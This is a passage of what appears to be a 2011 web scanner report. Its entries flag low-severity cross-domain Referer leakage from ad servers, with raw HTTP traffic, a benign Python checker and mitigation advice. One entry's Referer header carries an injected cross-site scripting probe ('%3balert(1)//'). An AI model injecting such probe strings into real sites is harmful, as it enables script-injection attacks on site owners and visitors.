Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADy5OcAyjtDTQAAAAAAAAAAAAAAAAAAAABbc0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?">
</SCRIPT>
...[SNIP]...
aqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2632647138?">
<IMG SRC="http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=fynY-cEEjEyoo-jgd2DP245a7fJlfzaqIP7RGO1EN1pCMLXiZYn+lZl1GiONbajXgP8MZvoIMUmiqFAfe1Dh257IAF8HzcAk7HK6p+9cgEE=!;ord=2632647138?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.5. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; see the response excerpt below.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 750
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;"><script language="JavaScript"> var zflag_nid="951"; var zfl
...[SNIP]...
</script> <script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...

17.6. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.130430.MINDSETMEDIA/B4053191

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; see the response excerpt below.

Request

GET /adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3f;ord=1656403? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 22:39:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1143

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/4/197/%2a/
...[SNIP]...
t1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B~sscs%3D%3fhttp://www.colehaan.com/colehaan/home.jsp?cp=mindset&csdartid=40167839_55761652"><img src="http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Lorenzo.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.7. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3093.130430.MINDSETMEDIA/B4053191

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; see the response excerpt below.

Request

GET /adi/N3093.130430.MINDSETMEDIA/B4053191;sz=300x250;click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/c%3B234739680%3B0-0%3B0%3B58581955%3B4307-300/250%3B39068367/39086124/1%3Bu%3D%2Cuol-70184290_1296254387%2C11d765b6a10b1b3%2Cent%2Cmm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B%7Esscs%3D%3f;ord=1656403?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1147
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:19:51 GMT
Expires: Sat, 29 Jan 2011 05:19:51 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/4/199/%2a/
...[SNIP]...
-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.%3B%7Esscs%3D%3fhttp://www.colehaan.com/colehaan/home.jsp?cp=mindset&csdartid=40167838_55761652"><img src="http://s0.2mdn.net/viewad/2376169/Jan+11+Transition+300x250+Stephanie.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.8. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3671.CentroNetwork/B5159652.2

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; see the response excerpt below.

Request

GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 21:57:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6328

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jan 14 14:04:00 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http%3a%2f%2ft-mobile-coverage.t-mobile.com/4G-Network-Coverage%3Fcm_mmc_o%3DKbl5kzYCjC-czywEwllCjCWwfcByLCjC8bEfwy%25208bEpBc"><img src="http://s0.2mdn.net/998766/0328_300x250_Winter_Largest4GNetwork_DataPlan_Static.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
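The condition behind every entry in this section is the same: the ad was loaded from a URL carrying parameters (the `;sz=...;click=...;ord=...?` tail of the request line), and the returned HTML embeds links and assets on other hosts, so each click or asset fetch sends that full URL in the Referer header to a third party. The check below reproduces that condition. It is an added example, not the scanner's own code and not from the page; the request line, Host and HTML body are constructed to match the shape of the DoubleClick entries above (shortened), and the function names are this example's own.

```python
"""Cross-domain Referer leakage check (added example, not scanner code)."""
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Constructed sample request: same shape as the /adi/... request lines above.
SAMPLE_REQUEST_LINE = (
    "GET /adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];"
    "click=http://ad.afy11.net/ad?c=EXAMPLE;ord=2803508621? HTTP/1.1"
)
SAMPLE_HOST = "ad.doubleclick.net"

# Constructed sample body: one same-host link, three third-party references,
# one relative link. Hosts are the ones that appear in the entries above.
SAMPLE_BODY = """<html><head><title>Advertisement</title></head><body>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/4/199/%2a/">
<img src="http://s0.2mdn.net/998766/creative.jpg" border="0" alt="Advertisement"></a>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43" width="0" height="0" />
<a href="/same-origin/path">same origin</a>
</body></html>"""

# href="..." / src='...' attribute values; enough for the flat ad markup here.
_ATTR_RE = re.compile(r"""(?:href|src)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def request_url(request_line: str, host: str) -> str:
    """Rebuild the absolute URL from an HTTP/1.1 request line and Host header."""
    _method, target, _version = request_line.split(" ", 2)
    if target.startswith(("http://", "https://")):
        return target  # absolute-form target, as sent through a proxy
    return f"http://{host}{target}"


def has_query_string(url: str) -> bool:
    """True if the URL carries parameters a Referer would expose: a '?' query
    (even an empty one, as in the ';ord=...?' requests above) or ';' matrix
    parameters inside the path."""
    return "?" in url or ";" in urlsplit(url).path


def extract_links(body: str) -> List[str]:
    """Every href/src target in the body, in document order."""
    return _ATTR_RE.findall(body)


def cross_domain_links(body: str, host: str) -> List[str]:
    """Absolute links whose host differs from the serving host.
    Relative and same-host links are dropped; result is sorted, de-duplicated."""
    host = host.lower()
    found = set()
    for link in extract_links(body):
        target = urlsplit(link).hostname
        if target and target.lower() != host:
            found.add(link)
    return sorted(found)


def third_party_hosts(body: str, host: str) -> List[str]:
    """Distinct third-party hosts that would receive the Referer."""
    return sorted({urlsplit(l).hostname.lower() for l in cross_domain_links(body, host)})


def check_referer_leak(request_line: str, host: str, body: str) -> Dict[str, object]:
    """The scanner's condition: parameters in the loaded URL AND links to other
    domains in the response. Both must hold for a leak to be reported."""
    url = request_url(request_line, host)
    hosts = third_party_hosts(body, host)
    params = has_query_string(url)
    return {
        "url": url,
        "parameters_in_url": params,
        "third_party_hosts": hosts,
        "leaks": params and bool(hosts),
    }


if __name__ == "__main__":
    print(check_referer_leak(SAMPLE_REQUEST_LINE, SAMPLE_HOST, SAMPLE_BODY))
```

The report rates these entries "Information" because the leaked values are ad-serving parameters, not secrets; the same check on a URL that carries a session identifier or a password-reset token is a real finding. A `Referrer-Policy: no-referrer` (or `strict-origin`) response header, or `rel="noreferrer"` on the outbound links, stops the URL from being sent to the third-party hosts the function lists.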

17.9. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5112048

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6464
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.farmers.com/landing/personal_insurance.html?SourceID=UFDC001L001"><img src="http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

17.10. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5112048

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6464

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
rv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=6957132&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.farmers.com/landing/personal_insurance.html?SourceID=UFDC001L001"><img src="http://s0.2mdn.net/2426847/DR_300x250_Auto_v3_REV.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>
<img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;57790187;233897387;40072800&migRandom=6957132&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" />
</body>
...[SNIP]...

17.11. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.TribalFusion.com/B5132291.17

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3740.TribalFusion.com/B5132291.17;sz=728x90;click=http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/;ord=1186282371? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 16:41:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5415

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
ATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/http://www.virginmobileusa.com/mobile-broadband/mifi-2200.html?cid=DDR11_bnr_tribal_broadbanddetail_broadband"><img src="http://s0.2mdn.net/2676519/virgin_mifi_40unltd_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.12. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

GET /adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5295
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
71071&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/ATT_BBTorch728x090.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087481;234178444;40401349&migRandom=5071071&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087481&AR_C=40401349"></script>
...[SNIP]...

17.13. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5128597.10

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the truncated response below).

Request

